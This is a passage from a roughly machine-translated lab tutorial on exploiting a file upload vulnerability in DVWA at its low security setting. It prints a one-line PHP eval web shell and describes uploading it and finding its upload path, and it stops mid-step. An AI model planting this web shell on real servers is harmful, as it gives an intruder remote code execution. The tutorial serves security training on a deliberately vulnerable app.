Obtain website shell permission based on file upload vulnerability

One 、 actual combat - be based on DVWA Of low Level demo file upload vulnerability

1、 File upload vulnerability profile

File Upload, File upload vulnerability , Usually due to the type of upload file 、 The content is not strictly filtered 、 Check , So that the attacker can get the server's webshell jurisdiction , Therefore, the harm caused by file upload vulnerability is often devastating ,Apache、Tomcat、Nginx And others have exposed file upload vulnerabilities .

Experimental environment ： The experimental environment in this section is ：Win7 Under the chrome The browser and burp suite Mainly .

2、 Upload Trojan files

newly build webshell.php, Write a word Trojan ：

<?php @eval($_POST[cwillchris]);?>

open DVWA, Choose a low security level , And then choose File Upload, Upload webshell.php

Web Check the location of file upload on the site , According to the prompt, in ../../hackable/uploads/webshell.php

open